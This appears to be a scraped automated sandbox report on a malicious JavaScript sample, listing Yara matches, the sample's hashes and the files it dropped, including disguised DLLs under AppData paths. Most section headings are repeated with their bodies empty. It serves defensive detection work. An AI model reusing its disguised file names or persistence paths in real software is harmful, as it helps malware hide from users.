Source: Yara match	File source: 0000000B.00000002.2810366627.000001FFB4EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3336481433.000000D2043F8000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2157667357.000001A3794F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4012, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Windows Analysis Report
Document_a19_79b555791-28h97348k5477-3219g9.js

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	1431885
Product:	CloudBasic
Start time:	22:46:50
Start date:	25.04.2024
Sample:	Document_a19_79b555791-28h97348k5477-3219g9.js
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	3f4ddf670c98e5b0656415286e42f730
SHA1:	cf27b8f44467cd4ab250b74caa039340ecd97a94
SHA256:	156c0afc01a5e346b95ebdb60cea9b7046ad7a61199cd63d6ad0f4ae32a576ac
Filetype:	Digital Micrograph Script (4001/1) 100.00%

Name	Type	MD5	SHA1	SHA256
:wtfbbq (copy)	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	74143402C40AC2E61E9F040A2D7E2D00	4053DC85BB86C47C63F96681D6A62C21CD6342A3	1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
C:\Config.Msi\3b3ac8.rbs	data	91E4F0F909BEA4B573874BB2F6D426FE	242121D2777E3E13D634AB7EBE94275E6CD7D20A	37B986F2829394101CA16C5FC5E52E09C4D3DB931C38C191A119624AAB0C6524
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression	29F65BA8E88C063813CC50A4EA544E93	05A7040D5C127E68C25D81CC51271FFB8BEF3568	1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C5C8CC0A7FE31816B4641D0465402560	Certificate, Version=3	E94FB54871208C00DF70F708AC47085B	4EFC31460C619ECAE59C1BCE2C008036D94C84B8	7B9D553E1C92CB6E8803E137F4F287D4363757F5D44B37D52F9FCA22FB97DF86
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	C0F082B14949D466997AE888611F8F78	5358F585EB4C796E7CB1E02C98688FDA5AC8E00F	69333A27A4F5D9FDBDD02E626FEE770AC7919820B562DC8E168CE090C5D649B3
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C5C8CC0A7FE31816B4641D0465402560	data	5493AEC1230B0FC7DDA3F2CAFDCBD4FD	E6560BA695556BBF380386938912365AB6E38897	89F094F12DD4F45DEA8C8025440DA21CA6809BD5E8291DD8446AFEB7EDD4D9D5
C:\Users\user\AppData\Local\sharepoint\360total.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	74143402C40AC2E61E9F040A2D7E2D00	4053DC85BB86C47C63F96681D6A62C21CD6342A3	1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	74143402C40AC2E61E9F040A2D7E2D00	4053DC85BB86C47C63F96681D6A62C21CD6342A3	1625AC230AA5CA950573F3BA0B1A7BD4C7FBD3E3686F9ECD4A40F1504BF33A11
C:\Users\user\AppData\Roaming\Custom_update\update_data.dat	data	A058D3B2CA77B5DF3C7AF94BB366EA79	6AE7F8B88C6FDAAE06DBF15A2A9E5F7E738A2D08	5A38E9C6CF4CF04EBC9E34D318CB189C3F57DDF66EAE45AA255FD6AE0F9C695E
C:\Windows\Installer\MSI39EE.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	475D20C0EA477A35660E3F67ECF0A1DF	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
C:\Windows\Installer\MSI3A4C.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	475D20C0EA477A35660E3F67ECF0A1DF	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
C:\Windows\Installer\MSI3A7C.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	475D20C0EA477A35660E3F67ECF0A1DF	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
C:\Windows\Installer\MSI3AAC.tmp	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	475D20C0EA477A35660E3F67ECF0A1DF	67340739F51E1134AE8F0FFC5AE9DD710E8E3A08	426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
C:\Windows\Installer\MSI3AEC.tmp	data	F62F03096698E5262F0B2D348C26D537	34515951BC013398B485166FD11969A99A7797D7	F0D7A54E156006E64697C88E03F7A23DF1E07079E974339B1CA6D30C5ABF54EA
C:\Windows\Installer\MSI3B6A.tmp	PE32 executable (GUI) Intel 80386, for MS Windows	B9545ED17695A32FACE8C3408A6A3553	F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83	1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
C:\Windows\Installer\MSIAA9D.tmp	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {805E70A6-23C0-4688-BBAF-6F995BB72730}, Number of Words: 10, Subject: 360 Total, Author: HuMaster LLC, Name of Creating Application: 360 Total, Template: ;1033, Comments: This installer database contains the logic and data required to install 360 Total., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200	666151C11B7899A0C764ABE711D3F9B3	35462114E096F4D307607D713136BFE38479870D	8041A15E27C785F2ADCCE9E8C643F5CC619B52E50CD36FF043D13C4089CE1CAD
C:\Windows\Installer\inprogressinstallinfo.ipi	Composite Document File V2 Document, Cannot read section info	F80C5CA698B670BAD025D06519EB4C0B	252388DC70003E5696A8EE7E7D2DEF5F5CEDC942	38681C09D09C8D8AB89071E67DC126A83F60B6C7768E4FDAA75E7EC4BC96E2A9
C:\Windows\Temp\~DF0C3825C8A6AE7DC2.TMP	Composite Document File V2 Document, Cannot read section info	F80C5CA698B670BAD025D06519EB4C0B	252388DC70003E5696A8EE7E7D2DEF5F5CEDC942	38681C09D09C8D8AB89071E67DC126A83F60B6C7768E4FDAA75E7EC4BC96E2A9
C:\Windows\Temp\~DF1B4ED7FDA427B494.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Windows\Temp\~DF22CBD4461B033FB8.TMP	Composite Document File V2 Document, Cannot read section info	4D10AEDC71EEBE654E03BF57E454F052	AAF0ADA9787825045DCD6B31D845667490894829	30F44CFE6AEE1C2DC531D3B731FFB7E0A7C6DBEA7DF0559866D4C6ED3E70742E
C:\Windows\Temp\~DF3025BC11E5C97B03.TMP	Composite Document File V2 Document, Cannot read section info	4D10AEDC71EEBE654E03BF57E454F052	AAF0ADA9787825045DCD6B31D845667490894829	30F44CFE6AEE1C2DC531D3B731FFB7E0A7C6DBEA7DF0559866D4C6ED3E70742E
C:\Windows\Temp\~DF41332C922F5AC300.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Windows\Temp\~DF428E4FF550ED71C3.TMP	data	6509761DC3DDB6A9CCFA3E13BF27F0A6	63CA953FD7F1B7F5A1756BEC835CC451BC294245	CE4CD0662EE0C9701A3525EDC4A0FEC333913590CE0055E3DF491A14026F629B
C:\Windows\Temp\~DF6629245EDF63459B.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Windows\Temp\~DFAB72B8B8E96537BE.TMP	Composite Document File V2 Document, Cannot read section info	F80C5CA698B670BAD025D06519EB4C0B	252388DC70003E5696A8EE7E7D2DEF5F5CEDC942	38681C09D09C8D8AB89071E67DC126A83F60B6C7768E4FDAA75E7EC4BC96E2A9
C:\Windows\Temp\~DFB1564F1E3995B003.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Windows\Temp\~DFD248A4793ACEF6ED.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Windows\Temp\~DFE66F7BB54D4BA8DC.TMP	Composite Document File V2 Document, Cannot read section info	4D10AEDC71EEBE654E03BF57E454F052	AAF0ADA9787825045DCD6B31D845667490894829	30F44CFE6AEE1C2DC531D3B731FFB7E0A7C6DBEA7DF0559866D4C6ED3E70742E

Windows Analysis Report Document_a19_79b555791-28h97348k5477-3219g9.js

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Document_a19_79b555791-28h97348k5477-3219g9.js

Malware Threat Intel
Provided by